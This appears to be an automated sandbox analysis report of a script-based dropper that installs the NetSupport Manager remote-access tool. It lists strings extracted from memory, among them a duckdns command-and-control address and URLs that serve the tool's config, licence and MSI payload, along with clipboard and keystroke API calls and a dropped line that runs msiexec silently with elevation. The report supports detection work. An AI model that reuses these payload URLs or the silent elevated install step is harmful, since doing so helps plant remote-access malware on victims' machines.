                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B462000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226577773.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114283016484.00000000038A6000.00000002.00000001.00040000.00000023.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B462000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226577773.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114283016484.00000000038A6000.00000002.00000001.00040000.00000023.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                                Source: wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B462000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226577773.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114283016484.00000000038A6000.00000002.00000001.00040000.00000023.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113948697299.00000000031ED000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114985870406.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115115331791.0000000003209000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.115183118649.00000000031E8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114973781450.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115046287156.0000000003209000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115034047959.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115149922654.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115069509491.00000000033E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115021399670.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115009038121.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114997111170.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115172297414.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000026.00000002.114307415040.0000000002C73000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000026.00000003.114303592438.0000000002C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                                Source: wscript.exe, 00000006.00000003.114061495045.0000000005C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226626711.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226774436.00000000010E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                Source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/latlong.asp?lat=%s&lng=%s&lang=%sGet
                                Source: client32.exe, 00000020.00000002.115177447611.0000000000A05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: client32.exe, 00000020.00000002.115187992990.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspLatLongclose
                                Source: client32.exe, 00000020.00000002.115177447611.0000000000A05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspY
                                Source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: http://localhost/ApprovedWebList.htmPrintSurveyInternet6
                                Source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: http://localhost/weblock.htmForcePowerOffConfirmationDisablePrintSurveyAnswerCountStudentVolumeLockS
                                Source: client32.exe, 00000020.00000002.115184199438.00000000033B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.115177447611.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.115183118649.00000000031B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.115177447611.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114560515905.0000000003231000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.115183965861.000000000325D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115102203122.0000000000A56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://megaeth1337.duckdns.org:1773/
                                Source: client32.exe, 00000020.00000002.115177447611.0000000000A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://megaeth1337.duckdns.org:1773/$
                                Source: client32.exe, 00000020.00000002.115184199438.00000000033B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://megaeth1337.duckdns.org:1773/(
                                Source: client32.exe, 00000020.00000002.115184199438.00000000033B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://megaeth1337.duckdns.org:1773/:
                                Source: client32.exe, 00000020.00000003.114560515905.00000000031A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://megaeth1337.duckdns.org:1773/C
                                Source: client32.exe, 00000020.00000003.115172079833.000000000325D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://megaeth1337.duckdns.org:1773/Rs
                                Source: client32.exe, 00000020.00000002.115184199438.00000000033B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://megaeth1337.duckdns.org:1773/b
                                Source: client32.exe, 00000020.00000002.115184199438.00000000033B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://megaeth1337.duckdns.org:1773/f
                                Source: client32.exe, 00000020.00000002.115184199438.00000000033B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://megaeth1337.duckdns.org:1773/n
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                                Source: wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B462000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226577773.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114283016484.00000000038A6000.00000002.00000001.00040000.00000023.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113950407001.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                                Source: wscript.exe, 00000006.00000003.114061495045.0000000005C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226626711.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226774436.00000000010E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                                Source: wscript.exe, 00000006.00000003.114061495045.0000000005C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226626711.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226774436.00000000010E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113950407001.0000000005014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113950407001.0000000005014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester4
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                                Source: client32.exe, 00000020.00000002.115187992990.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: https://help.netsupportschool.com/%s-%s/Default.htmhttps://help.netsupportschool.com/%s-%s/Default.h
                                Source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: https://netsupportschool.com/whats_newAn
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113948697299.00000000031ED000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.115184199438.00000000033DF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115021312689.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114973594833.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115069509491.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114997019143.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115033721477.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114974072870.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114951277329.00000000033DF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115102531113.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115046659044.00000000033F2000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115069858643.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115149779823.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115046659044.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115172921966.00000000033DF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115046037274.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115033607252.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115008881521.00000000033E8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 
00000020.00000003.115115628288.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000026.00000002.114307415040.0000000002C73000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000026.00000003.114303592438.0000000002C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                                Source: wscript.exeString found in binary or memory: https://okolinabeauty.com/choh/Client32.ini
                                Source: wscript.exeString found in binary or memory: https://okolinabeauty.com/choh/NSM.lic
                                Source: wscript.exeString found in binary or memory: https://okolinabeauty.com/choh/vrep.msi
                                Source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: https://provisionserver.domain/amtscsTechLogHotKeyPauseHotKeyEndScrapeShowApp225.16.8.69KeepAspectSe
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113950407001.00000000051F5000.00000004.00000800.00020000.00000000.sdmp, Pyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B462000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226577773.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114283016484.00000000038A6000.00000002.00000001.00040000.00000023.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B45E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, MSIF373.tmp, 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp, MSIF373.tmp, 00000019.00000000.114135574095.0000000000637000.00000008.00000001.01000000.0000000C.sdmp, MSIF985.tmp, 0000001B.00000000.114151205351.0000000000977000.00000008.00000001.01000000.0000000D.sdmp, MSIF985.tmp, 0000001B.00000002.114157116679.0000000000977000.00000004.00000001.01000000.0000000D.sdmp, checkdvd.exe, 0000001C.00000002.114215767889.00000000007CA000.00000004.00000001.01000000.0000000E.sdmp, checkdvd.exe, 0000001C.00000000.114214666288.00000000007CA000.00000008.00000001.01000000.0000000E.sdmp, MSI1387.tmp, 0000001D.00000002.114241948191.0000000001047000.00000004.00000001.01000000.0000000F.sdmp, MSI1387.tmp, 0000001D.00000000.114217707443.0000000001047000.00000008.00000001.01000000.0000000F.sdmp, winst64.exe, 0000001E.00000000.114225758017.00007FF679395000.00000008.00000001.01000000.00000010.sdmp, MSI23E6.tmp, 0000001F.00000002.114270878224.0000000000BF7000.00000004.00000001.01000000.00000014.sdmp, MSI23E6.tmp, 0000001F.00000000.114259508895.0000000000BF7000.00000008.00000001.01000000.00000014.sdmp, pcicfgui_client.exe, 00000022.00000002.114291271774.000000006B487000.00000004.00000001.01000000.00000022.sdmpString found in binary or memory: https://www.netsupportschool.com/ios-android/111
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown HTTPS traffic detected: 176.126.113.166:443 -> 192.168.11.20:49742 version: TLS 1.2
Source: C:\Windows\Installer\MSIF373.tmp Code function: 25_2_005C6A30 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard
Source: C:\Windows\Installer\MSIF985.tmp Code function: 27_2_00906A30 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard
Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe Code function: 28_2_00773FC0 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard
Source: C:\Windows\Installer\MSI1387.tmp Code function: 29_2_00FD6A30 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard
Source: client32.exe Binary or memory string: RegisterRawInputDevices
Source: C:\Windows\Installer\MSIF373.tmp Code function: 25_2_005DF030 GetLocalTime,wsprintfW,wsprintfW,wvsprintfW,wsprintfW,InitializeCriticalSection,EnterCriticalSection,GetCurrentDirectoryW,GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection,OutputDebugStringW,LeaveCriticalSection
Source: C:\Windows\Installer\MSIF373.tmp Code function: 25_2_005DF225 GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection
Source: C:\Windows\Installer\MSIF985.tmp Code function: 27_2_0091F030 GetLocalTime,wsprintfW,wsprintfW,wvsprintfW,wsprintfW,InitializeCriticalSection,EnterCriticalSection,GetCurrentDirectoryW,GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection,OutputDebugStringW,LeaveCriticalSection
Source: C:\Windows\Installer\MSIF985.tmp Code function: 27_2_0091F225 GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection
Source: C:\Windows\Installer\MSI1387.tmp Code function: 29_2_00FEF030 GetLocalTime,wsprintfW,wsprintfW,wvsprintfW,wsprintfW,InitializeCriticalSection,EnterCriticalSection,GetCurrentDirectoryW,GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection,OutputDebugStringW,LeaveCriticalSection
Source: C:\Windows\Installer\MSI1387.tmp Code function: 29_2_00FEF225 GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection

E-Banking Fraud

Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\Desktop\Pyyidau.vbs.exe "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc (Base64-encoded PowerShell command)

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell

System Summary

Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Dropped file: shell.ShellExecute "msiexec.exe", "/i """ & targetFile & """ /quiet", "", "runas", 1
